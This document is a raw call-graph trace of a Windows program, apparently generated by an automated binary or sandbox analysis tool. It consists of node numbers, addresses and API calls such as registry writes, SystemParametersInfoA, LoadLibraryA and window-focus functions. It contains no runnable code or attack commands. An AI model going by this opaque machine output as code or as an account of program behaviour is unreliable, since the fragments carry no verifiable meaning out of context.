std::locale::_Init 272 API calls 68943->68944 68945 110612ac 68944->68945 68946 110612b3 68945->68946 68988 1116305a std::exception::_Copy_str 68945->68988 68946->68934 68948 11061304 68989 111634b1 RaiseException 68948->68989 68950 11061319 68952 11061624 std::ios_base::_Ios_base_dtor 68951->68952 68954 11061355 68951->68954 68952->68939 68953 110614b4 68953->68952 68983 11061542 std::ios_base::_Ios_base_dtor 68953->68983 68990 110611e0 68953->68990 68954->68953 68956 11061401 RegEnumValueA 68954->68956 68957 11061389 RegQueryInfoKeyA 68954->68957 68958 1106149c 68956->68958 68967 11061435 68956->68967 68959 110613ae 68957->68959 68963 110613c2 68957->68963 68961 11163aa5 _free 67 API calls 68958->68961 68999 11029a70 272 API calls 2 library calls 68959->68999 68964 110614a9 68961->68964 68962 11081d30 IsDBCSLeadByte 68962->68967 68969 110613e2 68963->68969 69000 11029a70 272 API calls 2 library calls 68963->69000 68964->68953 68966 11163a11 _malloc 67 API calls 68970 110613f0 68966->68970 68967->68952 68967->68962 68971 1106146e RegEnumValueA 68967->68971 68975 11081e70 88 API calls 68967->68975 68968 110615a0 68968->68983 69003 11029a70 272 API calls 2 library calls 68968->69003 68969->68966 68970->68956 68971->68958 68971->68967 68973 11146a90 276 API calls 68973->68983 68975->68967 68979 11081d30 IsDBCSLeadByte 68979->68983 68982 11081e70 88 API calls 68982->68983 68983->68952 68983->68968 68983->68973 68983->68979 68983->68982 68985 110611a3 68984->68985 68986 110608e0 70 API calls 68985->68986 68987 110611c2 std::ios_base::_Ios_base_dtor 68986->68987 68987->68938 68988->68948 68989->68950 68991 110611ee 68990->68991 68992 11061208 68990->68992 69004 110608e0 68991->69004 68992->68983 68996 11145bc0 68992->68996 68994 11061200 69012 110610f0 68994->69012 69053 111434c0 68996->69053 69001 1105ef20 272 API calls 69005 110608f4 69004->69005 69011 1106092c 69004->69011 69007 110608f8 69005->69007 69005->69011 69006 11060992 69006->68994 69015 110606d0 69007->69015 69011->69006 69020 11060470 70 API calls 2 library calls 69011->69020 69022 110609a0 69012->69022 69016 1106070e 69015->69016 69018 110606e3 std::ios_base::_Ios_base_dtor 69015->69018 69016->68994 69017 110606d0 67 API calls 69017->69018 69018->69016 69018->69017 69021 1105fea0 67 API calls 2 library calls 69018->69021 69020->69011 69021->69018 69023 11060a24 69022->69023 69024 110609df 69022->69024 69023->68992 69030 11060820 69024->69030 69054 111434d0 69053->69054 69054->69054 69055 11110230 272 API calls 69054->69055 69056 111434f8 69055->69056 69059 111433d0 9 API calls 2 library calls 69056->69059 69058 1106151f 69058->69001 69059->69058 70299->67562 70300->67566 70301->67591 70302->67578 70304->67599 70305->67627 70306->67629 70337 110262f0 70338 110262fe GetProcAddress 70337->70338 70339 1102630f 70337->70339 70338->70339 70340 11026328 70339->70340 70341 1102631c K32GetProcessImageFileNameA 70339->70341 70343 1102632e GetProcAddress 70340->70343 70344 1102633f 70340->70344 70341->70340 70342 11026361 70341->70342 70343->70344 70345 11026346 70344->70345 70346 11026357 SetLastError 70344->70346 70346->70342 70347 11137300 70348 1113736d 70347->70348 70349 1113730c 70347->70349 70350 1105e820 79 API calls 70349->70350 70352 11137325 70350->70352 70351 1113734d 70351->70348 70367 1112f930 147 API calls std::locale::_Init 70351->70367 70352->70348 70352->70351 70355 1112fc70 70352->70355 70356 1112fd09 70355->70356 70357 1112fc7d 70355->70357 70356->70351 70358 1112fcb8 70357->70358 70368 111165c0 70357->70368 70360 1112fcd2 70358->70360 70432 1111c990 70358->70432 70360->70356 70364 1105e820 79 API calls 70360->70364 70361 1112fca9 70414 11116880 70361->70414 70365 1112fcf4 70364->70365 70365->70356 70547 11116d50 70365->70547 70367->70348 70369 111165e4 70368->70369 70370 1111685a 70368->70370 70371 1111677d SystemParametersInfoA 70369->70371 70372 111165ec 70369->70372 70373 11145ef0 std::locale::_Init 93 API calls 70370->70373 70376 111167a8 70371->70376 70374 111166e0 70372->70374 70384 11145ef0 std::locale::_Init 93 API calls 70372->70384 70375 11116868 70373->70375 70377 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 70374->70377 70378 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 70375->70378 70379 11116833 SystemParametersInfoA 70376->70379 70380 111167bc 70376->70380 70381 111166ef 70377->70381 70382 11116876 70378->70382 70383 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 70379->70383 70385 11143bd0 std::locale::_Init RegQueryValueExA 70380->70385 70381->70361 70382->70361 70386 11116854 70383->70386 70387 11116615 70384->70387 70388 111167e4 70385->70388 70386->70361 70389 111166f5 SystemParametersInfoA 70387->70389 70392 11116627 70387->70392 70390 11116814 RegCloseKey 70388->70390 70559 111648ed 79 API calls __isdigit_l 70388->70559 70393 1111676e SystemParametersInfoA 70389->70393 70394 1111670e 70389->70394 70391 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 70390->70391 70395 1111682d 70391->70395 70392->70374 70398 11143bd0 std::locale::_Init RegQueryValueExA 70392->70398 70393->70374 70396 11143bd0 std::locale::_Init RegQueryValueExA 70394->70396 70395->70361 70399 1111673a 70396->70399 70401 11116650 70398->70401 70402 111166d9 RegCloseKey 70399->70402 70558 111648ed 79 API calls __isdigit_l 70399->70558 70400 111167fe 70400->70390 70403 11116805 SystemParametersInfoA 70400->70403 70404 11116678 70401->70404 70406 11116666 SystemParametersInfoA 70401->70406 70402->70374 70403->70390 70407 11143bd0 std::locale::_Init RegQueryValueExA 70404->70407 70406->70404 70408 111166a4 70407->70408 70408->70402 70557 111648ed 79 API calls __isdigit_l 70408->70557 70409 11116754 70409->70402 70410 1111675f SystemParametersInfoA 70409->70410 70410->70402 70412 111166be 70412->70402 70413 111166c5 SystemParametersInfoA 70412->70413 70413->70402 70415 11145ef0 std::locale::_Init 93 API calls 70414->70415 70418 1111689e 70415->70418 70416 111168d4 CoInitialize CoCreateInstance 70420 11116904 LoadLibraryA 70416->70420 70431 111168f9 70416->70431 70417 111168a8 70421 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 70417->70421 70418->70417 70419 11145c70 std::locale::_Init 93 API calls 70418->70419 70422 111168c5 70418->70422 70419->70422 70423 11116920 GetProcAddress 70420->70423 70420->70431 70424 111168b6 70421->70424 70422->70416 70422->70417 70427 11116930 SHGetSettings 70423->70427 70428 11116944 FreeLibrary 70423->70428 70424->70358 70425 111169e1 CoUninitialize 70426 111169e7 70425->70426 70429 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 70426->70429 70427->70428 70428->70431 70430 111169f6 70429->70430 70430->70358 70431->70425 70431->70426 70433 1111c9b0 70432->70433 70434 1111c9c3 70432->70434 70435 1105e820 79 API calls 70433->70435 70436 1111ca03 SystemParametersInfoA 70434->70436 70437 1111c9cf 70434->70437 70438 1111ca0c 70434->70438 70435->70434 70436->70438 70437->70438 70440 11145ef0 std::locale::_Init 93 API calls 70437->70440 70439 1111ca38 70438->70439 70441 1105e820 79 API calls 70438->70441 70442 1111ca44 70439->70442 70443 1111ca6b SystemParametersInfoA 70439->70443 70445 1111ca7d 70439->70445 70444 1111c9dc 70440->70444 70441->70439 70442->70445 70448 1111ca56 SystemParametersInfoA 70442->70448 70443->70445 70446 1111c9e0 GetSystemMetrics 70444->70446 70447 1111c9ec 70444->70447 70449 1111ca9c 70445->70449 70453 1105e820 79 API calls 70445->70453 70446->70438 70446->70447 70447->70438 70450 1111c9f1 SystemParametersInfoA 70447->70450 70448->70445 70451 1111caa8 70449->70451 70452 1111cacc SystemParametersInfoA 70449->70452 70454 1111cadb 70449->70454 70450->70438 70451->70454 70455 1111cab7 SystemParametersInfoA 70451->70455 70452->70454 70453->70449 70456 1105e820 79 API calls 70454->70456 70460 1111cafa 70454->70460 70455->70454 70456->70460 70457 1111cb06 70459 1111cb39 70457->70459 70462 1111cb15 SystemParametersInfoA 70457->70462 70458 1111cb2a SystemParametersInfoA 70458->70459 70461 1111cb58 70459->70461 70463 1105e820 79 API calls 70459->70463 70460->70457 70460->70458 70460->70459 70464 1111cb64 70461->70464 70465 1111cb88 SystemParametersInfoA 70461->70465 70466 1111cb97 70461->70466 70462->70459 70463->70461 70464->70466 70467 1111cb73 SystemParametersInfoA 70464->70467 70465->70466 70468 1111cbb6 70466->70468 70471 1105e820 79 API calls 70466->70471 70467->70466 70469 1111cbc2 70468->70469 70470 1111cbe6 SystemParametersInfoA 70468->70470 70472 1111cbf5 70468->70472 70469->70472 70473 1111cbd1 SystemParametersInfoA 70469->70473 70470->70472 70471->70468 70474 1111cc14 70472->70474 70475 1105e820 79 API calls 70472->70475 70473->70472 70476 1111cc20 70474->70476 70477 1111cc44 SystemParametersInfoA 70474->70477 70478 1111cc53 70474->70478 70475->70474 70476->70478 70479 1111cc2f SystemParametersInfoA 70476->70479 70477->70478 70480 1111cc72 70478->70480 70481 1105e820 79 API calls 70478->70481 70479->70478 70482 1111cca2 SystemParametersInfoA 70480->70482 70483 1111cc7e 70480->70483 70484 1111ccb1 70480->70484 70481->70480 70482->70484 70483->70484 70485 1111cc8d SystemParametersInfoA 70483->70485 70486 1111ccd0 70484->70486 70489 1105e820 79 API calls 70484->70489 70485->70484 70487 1111cd00 SystemParametersInfoA 70486->70487 70488 1111ccdc 70486->70488 70490 1111cd0f 70486->70490 70487->70490 70488->70490 70491 1111cceb SystemParametersInfoA 70488->70491 70489->70486 70492 1111cd2e 70490->70492 70493 1105e820 79 API calls 70490->70493 70491->70490 70494 1111cd65 70492->70494 70495 1111cd3a 70492->70495 70497 1111cd5c 70492->70497 70493->70492 70560 11116e30 70494->70560 70495->70497 70498 11116e30 4 API calls 70495->70498 70499 1111cd9a 70497->70499 70500 1105e820 79 API calls 70497->70500 70498->70497 70501 1111cda6 70499->70501 70502 1111cdca SystemParametersInfoA 70499->70502 70503 1111cdd9 70499->70503 70500->70499 70501->70503 70505 1111cdb5 SystemParametersInfoA 70501->70505 70502->70503 70504 1111cdf8 70503->70504 70506 1105e820 79 API calls 70503->70506 70507 1111ce25 SystemParametersInfoA 70504->70507 70508 1111ce04 70504->70508 70509 1111ce31 70504->70509 70505->70503 70506->70504 70507->70509 70508->70509 70510 1111ce13 SystemParametersInfoA 70508->70510 70511 1111ce50 70509->70511 70514 1105e820 79 API calls 70509->70514 70510->70509 70512 1111ce83 70511->70512 70513 1111ce5c 70511->70513 70516 1111ce7a 70511->70516 70571 11116ee0 70512->70571 70513->70516 70517 11116ee0 4 API calls 70513->70517 70514->70511 70518 1111ceba 70516->70518 70519 1105e820 79 API calls 70516->70519 70517->70516 70520 1111cec6 70518->70520 70521 1111ceed 70518->70521 70523 1111cee4 70518->70523 70519->70518 70520->70523 70524 11116f00 4 API calls 70520->70524 70574 11116f00 70521->70574 70525 1111cf1e 70523->70525 70526 1105e820 79 API calls 70523->70526 70524->70523 70527 1111cf51 70525->70527 70528 1111cf2a 70525->70528 70530 1111cf48 70525->70530 70526->70525 70529 11116f00 4 API calls 70527->70529 70528->70530 70531 11116f00 4 API calls 70528->70531 70529->70530 70532 1111cf82 70530->70532 70533 1105e820 79 API calls 70530->70533 70531->70530 70534 1111cfb5 70532->70534 70535 1111cf8e 70532->70535 70537 1111cfac 70532->70537 70533->70532 70536 11116f00 4 API calls 70534->70536 70535->70537 70538 11116f00 4 API calls 70535->70538 70536->70537 70539 1111cfe6 70537->70539 70540 1105e820 79 API calls 70537->70540 70538->70537 70541 1111cff2 70539->70541 70542 1111d01e 70539->70542 70544 1111d030 70539->70544 70540->70539 70541->70544 70545 11116f00 4 API calls 70541->70545 70543 11116f00 4 API calls 70542->70543 70543->70544 70544->70360 70546 1111d010 70545->70546 70546->70360 70548 11145ef0 std::locale::_Init 93 API calls 70547->70548 70549 11116d5b 70548->70549 70550 11116de3 70549->70550 70551 11116d63 RegOpenKeyExA 70549->70551 70550->70356 70551->70550 70552 11116d8c 70551->70552 70553 11116dc3 RegSetValueExA RegCloseKey 70552->70553 70554 11116d93 70552->70554 70553->70550 70555 11143bd0 std::locale::_Init RegQueryValueExA 70554->70555 70556 11116db0 RegCloseKey 70555->70556 70556->70356 70557->70412 70558->70409 70559->70400 70561 11116e54 70560->70561 70562 11116ecb 70561->70562 70563 11116e68 70561->70563 70564 11116e8d 70561->70564 70562->70497 70565 11143bd0 std::locale::_Init RegQueryValueExA 70563->70565 70566 11116eb2 RegSetValueExA 70564->70566 70568 11143bd0 std::locale::_Init RegQueryValueExA 70564->70568 70567 11116e7d RegCloseKey 70565->70567 70569 11116ec4 RegCloseKey 70566->70569 70567->70497 70570 11116eab 70568->70570 70569->70562 70570->70566 70570->70569 70572 11116e30 4 API calls 70571->70572 70573 11116efb 70572->70573 70573->70516 70575 11116e30 4 API calls 70574->70575 70576 11116f1b 70575->70576 70576->70523 70577 1113d980 70578 1113d989 70577->70578 70579 1113d98e 70577->70579 70581 11139ed0 70578->70581 70582 11139f12 70581->70582 70583 11139f07 GetCurrentThreadId 70581->70583 70584 11139f20 70582->70584 70715 11029950 70582->70715 70583->70582 70722 11134830 70584->70722 70590 1113a011 70595 1113a042 FindWindowA 70590->70595 70601 1113a0da 70590->70601 70591 1113a59a 70593 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 70591->70593 70596 1113a5b2 70593->70596 70594 11139f5c IsWindow IsWindowVisible 70597 11147060 std::locale::_Init 21 API calls 70594->70597 70598 1113a057 IsWindowVisible 70595->70598 70595->70601 70596->70579 70599 11139f87 70597->70599 70600 1113a05e 70598->70600 70598->70601 70603 1105e820 79 API calls 70599->70603 70600->70601 70608 11139a70 374 API calls 70600->70608 70604 1105e820 79 API calls 70601->70604 70614 1113a0ff 70601->70614 70602 1113a2b0 70607 1113a2ca 70602->70607 70611 11139a70 374 API calls 70602->70611 70606 11139fa3 IsWindowVisible 70603->70606 70624 1113a127 70604->70624 70605 1105e820 79 API calls 70609 1113a29f 70605->70609 70606->70590 70610 11139fb1 70606->70610 70613 1113a2e7 70607->70613 70958 1106c340 307 API calls 70607->70958 70612 1113a07f IsWindowVisible 70608->70612 70609->70602 70615 1113a2a4 70609->70615 70610->70590 70616 11139fb9 70610->70616 70611->70607 70612->70601 70617 1113a08e IsIconic 70612->70617 70959 1112ddd0 12 API calls 2 library calls 70613->70959 70614->70602 70614->70605 70957 1102d750 301 API calls std::locale::_Init 70615->70957 70622 11147060 std::locale::_Init 21 API calls 70616->70622 70617->70601 70623 1113a09f GetForegroundWindow 70617->70623 70620 1113a2ec 70626 1113a2f4 70620->70626 70627 1113a2fd 70620->70627 70629 11139fc3 GetForegroundWindow 70622->70629 70955 11132120 150 API calls 70623->70955 70624->70614 70625 1113a174 70624->70625 70631 11081d30 IsDBCSLeadByte 70624->70631 70633 11143e00 std::locale::_Init 8 API calls 70625->70633 70960 11132a10 89 API calls 2 library calls 70626->70960 70634 1113a314 70627->70634 70635 1113a308 70627->70635 70628 1113a2ab 70628->70602 70636 11139fd2 EnableWindow 70629->70636 70637 11139ffe 70629->70637 70631->70625 70641 1113a186 70633->70641 70962 111326b0 308 API calls std::locale::_Init 70634->70962 70642 1113a319 70635->70642 70961 11132780 308 API calls std::locale::_Init 70635->70961 70953 11132120 150 API calls 70636->70953 70637->70590 70645 1113a00a SetForegroundWindow 70637->70645 70638 1113a0ae 70956 11132120 150 API calls 70638->70956 70640 1113a2fa 70640->70627 70647 1113a193 GetLastError 70641->70647 70664 1113a1a1 70641->70664 70649 1113a312 70642->70649 70650 1113a429 70642->70650 70645->70590 70646 1113a0b5 70653 1113a0cb EnableWindow 70646->70653 70658 1113a0c4 SetForegroundWindow 70646->70658 70654 11147060 std::locale::_Init 21 API calls 70647->70654 70649->70642 70655 1113a331 70649->70655 70656 1113a3db 70649->70656 70652 11139600 312 API calls 70650->70652 70651 11139fe9 70954 11132120 150 API calls 70651->70954 70672 1113a42e 70652->70672 70653->70601 70654->70664 70655->70650 70662 111101b0 std::locale::_Init 272 API calls 70655->70662 70656->70650 70970 1103f920 71 API calls 70656->70970 70658->70653 70659 11139ff0 EnableWindow 70659->70637 70660 1113a455 70674 1105e820 79 API calls 70660->70674 70714 1113a57a std::ios_base::_Ios_base_dtor 70660->70714 70666 1113a352 70662->70666 70663 1113a3ea 70971 1103f960 71 API calls 70663->70971 70664->70614 70665 1113a1f2 70664->70665 70669 11081d30 IsDBCSLeadByte 70664->70669 70667 11143e00 std::locale::_Init 8 API calls 70665->70667 70670 1113a373 70666->70670 70963 11057eb0 316 API calls 70666->70963 70671 1113a204 70667->70671 70669->70665 70964 1110fff0 InterlockedIncrement 70670->70964 70671->70614 70676 1113a20b GetLastError 70671->70676 70672->70660 70869 11142d90 70672->70869 70673 1113a3f5 70972 1103f980 71 API calls 70673->70972 70686 1113a485 70674->70686 70679 11147060 std::locale::_Init 21 API calls 70676->70679 70679->70614 70681 1113a400 70973 1103f940 71 API calls 70681->70973 70682 1113a398 70965 1104d790 458 API calls 70682->70965 70685 1113a40b 70974 11110000 InterlockedDecrement 70685->70974 70687 1113a4cd 70686->70687 70690 1113a4aa 70686->70690 70691 1113a4d9 GetTickCount 70686->70691 70686->70714 70687->70691 70687->70714 70688 1113a3a3 70966 1104ecd0 458 API calls 70688->70966 70694 11147060 std::locale::_Init 21 API calls 70690->70694 70695 1113a4eb 70691->70695 70691->70714 70693 1113a3d9 70693->70650 70697 1113a4b5 GetTickCount 70694->70697 70698 11143a50 148 API calls 70695->70698 70696 1113a3ae 70967 1104ed40 458 API calls 70696->70967 70697->70714 70700 1113a4f7 70698->70700 70702 11147af0 276 API calls 70700->70702 70701 1113a3b9 70968 1104d7d0 458 API calls 70701->70968 70705 1113a502 70702->70705 70704 1113a3c4 70704->70650 70969 110ec320 294 API calls 70704->70969 70706 11143a50 148 API calls 70705->70706 70708 1113a515 70706->70708 70975 110261a0 LoadLibraryA 70708->70975 70710 1113a522 70710->70710 70976 1112d6e0 GetProcAddress SetLastError 70710->70976 70712 1113a569 70713 1113a573 FreeLibrary 70712->70713 70712->70714 70713->70714 70714->70591 70977 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 70715->70977 70717 1102995e 70718 11029973 70717->70718 70978 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 70717->70978 70979 11089fe0 276 API calls 2 library calls 70718->70979 70721 1102997e 70721->70584 70723 11134872 70722->70723 70724 11134b94 70722->70724 70726 1105e820 79 API calls 70723->70726 70725 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 70724->70725 70727 11134bac 70725->70727 70728 11134892 70726->70728 70770 11134310 70727->70770 70728->70724 70729 1113489a GetLocalTime 70728->70729 70730 111348d1 LoadLibraryA 70729->70730 70731 111348b0 70729->70731 70980 11009940 LoadLibraryA 70730->70980 70732 11147060 std::locale::_Init 21 API calls 70731->70732 70734 111348c5 70732->70734 70734->70730 70735 11134925 70981 110161e0 LoadLibraryA 70735->70981 70737 11134930 GetCurrentProcess 70738 11134955 GetProcAddress 70737->70738 70739 1113496d GetProcessHandleCount 70737->70739 70738->70739 70740 11134976 SetLastError 70738->70740 70741 1113497e 70739->70741 70740->70741 70742 111349a2 70741->70742 70743 11134988 GetProcAddress 70741->70743 70745 111349b0 GetProcAddress 70742->70745 70746 111349ca 70742->70746 70743->70742 70744 111349d7 SetLastError 70743->70744 70744->70745 70745->70746 70747 111349e4 SetLastError 70745->70747 70748 111349ef GetProcAddress 70746->70748 70747->70748 70749 11134a01 K32GetProcessMemoryInfo 70748->70749 70750 11134a0f SetLastError 70748->70750 70751 11134a17 70749->70751 70750->70751 70752 11147060 std::locale::_Init 21 API calls 70751->70752 70758 11134a8d 70751->70758 70752->70758 70753 11134b6a 70754 11134b7a FreeLibrary 70753->70754 70755 11134b7d 70753->70755 70754->70755 70756 11134b87 FreeLibrary 70755->70756 70757 11134b8a 70755->70757 70756->70757 70757->70724 70759 11134b91 FreeLibrary 70757->70759 70758->70753 70760 1105e820 79 API calls 70758->70760 70759->70724 70761 11134ade 70760->70761 70762 1105e820 79 API calls 70761->70762 70763 11134b06 70762->70763 70764 1105e820 79 API calls 70763->70764 70765 11134b2d 70764->70765 70766 1105e820 79 API calls 70765->70766 70767 11134b54 70766->70767 70767->70753 70768 11134b65 70767->70768 70982 11027de0 272 API calls 2 library calls 70768->70982 70772 1113433d 70770->70772 70771 111347f9 70771->70590 70771->70591 70873 11139a70 70771->70873 70772->70771 70773 110d1930 275 API calls 70772->70773 70774 1113439e 70773->70774 70775 110d1930 275 API calls 70774->70775 70776 111343a9 70775->70776 70777 111343d7 70776->70777 70778 111343ee 70776->70778 70983 11029a70 272 API calls 2 library calls 70777->70983 70780 11147060 std::locale::_Init 21 API calls 70778->70780 70782 111343fc 70780->70782 70984 110d1530 272 API calls 70782->70984 70870 11142d9a 70869->70870 70872 11142daf 70869->70872 70985 11142400 70870->70985 70872->70660 70874 11139eaf 70873->70874 70877 11139a8d 70873->70877 70875 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 70874->70875 70876 11139ebe 70875->70876 70876->70594 70877->70874 70878 11145c70 std::locale::_Init 93 API calls 70877->70878 70879 11139acc 70878->70879 70879->70874 70880 1105e820 79 API calls 70879->70880 70881 11139afb 70880->70881 71117 1112d860 70881->71117 70883 11139c40 PostMessageA 70884 11139c55 70883->70884 70887 11139c65 70884->70887 71124 11110000 InterlockedDecrement 70884->71124 70885 1105e820 79 API calls 70886 11139c3c 70885->70886 70886->70883 70886->70884 70889 11139c6b 70887->70889 70890 11139c8d 70887->70890 70892 11139cc3 std::ios_base::_Ios_base_dtor 70889->70892 70893 11139cde 70889->70893 71125 11131320 293 API calls std::locale::_Init 70890->71125 70900 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 70892->70900 70895 11143a50 148 API calls 70893->70895 70894 11139c95 71126 11147ad0 98 API calls 70894->71126 70898 11139ce3 70895->70898 70897 11139b4b 70906 11146710 278 API calls 70897->70906 70908 11139beb 70897->70908 70901 11147af0 276 API calls 70898->70901 70899 11139c9f 71127 1112da60 SetDlgItemTextA 70899->71127 70904 11139cda 70900->70904 70905 11139cea SetWindowTextA 70901->70905 70903 11139cb0 std::ios_base::_Ios_base_dtor 70903->70889 70904->70594 70907 11139d06 70905->70907 70914 11139d0d std::ios_base::_Ios_base_dtor 70905->70914 70906->70908 71128 111361c0 307 API calls 4 library calls 70907->71128 70908->70883 70908->70885 70910 11139d64 70911 11139d78 70910->70911 70912 11139e3c 70910->70912 70915 11139d9c 70911->70915 71131 111361c0 307 API calls 4 library calls 70911->71131 70917 11139e5d 70912->70917 70921 11139e4b 70912->70921 70922 11139e44 70912->70922 70913 11139d37 70913->70910 70918 11139d4c 70913->70918 70914->70910 70914->70913 71129 111361c0 307 API calls 4 library calls 70914->71129 71133 110f8b70 88 API calls 70915->71133 71137 110f8b70 88 API calls 70917->71137 71130 11132120 150 API calls 70918->71130 71136 11132120 150 API calls 70921->71136 71135 111361c0 307 API calls 4 library calls 70922->71135 70925 11139e68 70925->70874 70932 11139e6c IsWindowVisible 70925->70932 70926 11139da7 70926->70874 70933 11139daf IsWindowVisible 70926->70933 70928 11139d5c 70928->70910 70930 11139e5a 70930->70917 70931 11139d86 70931->70915 70934 11139d92 70931->70934 70932->70874 70935 11139e7e IsWindowVisible 70932->70935 70933->70874 70936 11139dc6 70933->70936 71132 11132120 150 API calls 70934->71132 70935->70874 70938 11139e8b EnableWindow 70935->70938 70939 11145c70 std::locale::_Init 93 API calls 70936->70939 71138 11132120 150 API calls 70938->71138 70942 11139dd1 70939->70942 70940 11139d99 70940->70915 70942->70874 70944 11139ddc GetForegroundWindow IsWindowVisible 70942->70944 70943 11139ea2 EnableWindow 70943->70874 70945 11139e01 70944->70945 70946 11139df6 EnableWindow 70944->70946 71134 11132120 150 API calls 70945->71134 70946->70945 70948 11139e08 70949 11139e1e EnableWindow 70948->70949 70950 11139e17 SetForegroundWindow 70948->70950 70951 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 70949->70951 70950->70949 70952 11139e38 70951->70952 70952->70594 70953->70651 70954->70659 70955->70638 70956->70646 70957->70628 70958->70613 70959->70620 70960->70640 70961->70649 70962->70642 70963->70670 70964->70682 70965->70688 70966->70696 70967->70701 70968->70704 70969->70693 70970->70663 70971->70673 70972->70681 70973->70685 70974->70693 70975->70710 70976->70712 70977->70717 70978->70717 70979->70721 70980->70735 70981->70737 70982->70753 70986 1114243f 70985->70986 71038 11142438 std::ios_base::_Ios_base_dtor 70985->71038 70987 111101b0 std::locale::_Init 272 API calls 70986->70987 70988 11142446 70987->70988 70990 11142476 70988->70990 70992 11061aa0 310 API calls 70988->70992 70989 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 70991 11142d8a 70989->70991 70993 11062220 114 API calls 70990->70993 70991->70872 70992->70990 70994 111424b2 70993->70994 70995 111424b9 RegCloseKey 70994->70995 70996 111424c0 std::locale::_Init 70994->70996 70995->70996 70997 111424cf 70996->70997 70998 1102a6d0 369 API calls 70996->70998 70999 11145990 274 API calls 70997->70999 70998->70997 71000 111424ec 70999->71000 71001 11143e00 std::locale::_Init 8 API calls 71000->71001 71002 11142500 71001->71002 71003 11142517 71002->71003 71004 11063880 344 API calls 71002->71004 71005 111101b0 std::locale::_Init 272 API calls 71003->71005 71004->71003 71006 1114251e 71005->71006 71007 1114253a 71006->71007 71008 11061710 301 API calls 71006->71008 71009 111101b0 std::locale::_Init 272 API calls 71007->71009 71008->71007 71010 11142553 71009->71010 71011 1114256f 71010->71011 71012 11061710 301 API calls 71010->71012 71013 111101b0 std::locale::_Init 272 API calls 71011->71013 71012->71011 71014 11142588 71013->71014 71015 111425a4 71014->71015 71016 11061710 301 API calls 71014->71016 71017 11061290 274 API calls 71015->71017 71016->71015 71018 111425cd 71017->71018 71019 11061290 274 API calls 71018->71019 71039 111425e7 71019->71039 71020 11142915 71021 110d1930 275 API calls 71020->71021 71024 11142cf9 71020->71024 71023 11142933 71021->71023 71022 11061320 283 API calls 71022->71039 71027 1105e820 79 API calls 71023->71027 71030 11061170 70 API calls 71024->71030 71025 11142905 71026 11147060 std::locale::_Init 21 API calls 71025->71026 71026->71020 71029 11142970 71027->71029 71028 11147060 21 API calls std::locale::_Init 71028->71039 71031 11142abd 71029->71031 71033 11061290 274 API calls 71029->71033 71032 11142d52 71030->71032 71035 11061a70 283 API calls 71031->71035 71034 11061170 70 API calls 71032->71034 71037 1114298e 71033->71037 71034->71038 71040 11142ad9 71035->71040 71036 11132900 88 API calls 71036->71039 71041 11061320 283 API calls 71037->71041 71038->70989 71039->71020 71039->71022 71039->71025 71039->71028 71039->71036 71056 11081e70 88 API calls 71039->71056 71061 11081f20 88 API calls std::locale::_Init 71039->71061 71112 110684e0 307 API calls std::locale::_Init 71040->71112 71049 1114299d 71041->71049 71043 111429d2 71044 11061290 274 API calls 71043->71044 71047 111429e8 71044->71047 71045 11142b03 71048 11142b33 EnterCriticalSection 71045->71048 71073 11142b07 71045->71073 71046 11147060 std::locale::_Init 21 API calls 71046->71049 71050 11061320 283 API calls 71047->71050 71051 11060f50 278 API calls 71048->71051 71049->71043 71049->71046 71052 11061320 283 API calls 71049->71052 71067 111429f8 71050->71067 71054 11142b50 71051->71054 71052->71049 71055 11061a70 283 API calls 71054->71055 71058 11142b66 71055->71058 71056->71039 71057 11142a31 71059 11061290 274 API calls 71057->71059 71060 11142b7a LeaveCriticalSection 71058->71060 71064 1102b140 292 API calls 71058->71064 71063 11142a47 71059->71063 71065 11142bce 71060->71065 71066 11142b8e 71060->71066 71061->71039 71062 11147060 std::locale::_Init 21 API calls 71062->71067 71069 11061320 283 API calls 71063->71069 71070 11142b77 71064->71070 71071 11134310 280 API calls 71065->71071 71066->71065 71076 11147060 std::locale::_Init 21 API calls 71066->71076 71067->71057 71067->71062 71072 11061320 283 API calls 71067->71072 71083 11142a56 71069->71083 71070->71060 71075 11142bd8 71071->71075 71072->71067 71073->71048 71113 11051360 367 API calls 4 library calls 71073->71113 71114 110684e0 307 API calls std::locale::_Init 71073->71114 71074 11142a91 71078 11061170 70 API calls 71074->71078 71077 110d1930 275 API calls 71075->71077 71079 11142b9c 71076->71079 71081 11142be6 71077->71081 71082 11142a9f 71078->71082 71087 11142010 366 API calls 71079->71087 71080 11147060 std::locale::_Init 21 API calls 71080->71083 71115 110d0170 272 API calls std::locale::_Init 71081->71115 71084 11061170 70 API calls 71082->71084 71083->71074 71083->71080 71085 11061320 283 API calls 71083->71085 71086 11142aae 71084->71086 71085->71083 71089 11061170 70 API calls 71086->71089 71090 11142ba7 71087->71090 71089->71031 71090->71065 71092 11147060 std::locale::_Init 21 API calls 71090->71092 71091 11142c1c 71106 11142c9f 71091->71106 71116 110d1530 272 API calls 71091->71116 71093 11142bc0 71092->71093 71096 11027200 410 API calls 71093->71096 71094 110d0a10 272 API calls 71097 11142cdb 71094->71097 71096->71065 71101 110d0a10 272 API calls 71097->71101 71101->71024 71106->71094 71112->71045 71113->71073 71114->71073 71115->71091 71118 1112d87c 71117->71118 71119 1112d8b7 71118->71119 71120 1112d8a4 71118->71120 71139 1106c340 307 API calls 71119->71139 71122 11147af0 276 API calls 71120->71122 71123 1112d8af 71122->71123 71123->70897 71124->70887 71125->70894 71126->70899 71127->70903 71128->70914 71129->70913 71130->70928 71131->70931 71132->70940 71133->70926 71134->70948 71135->70921 71136->70930 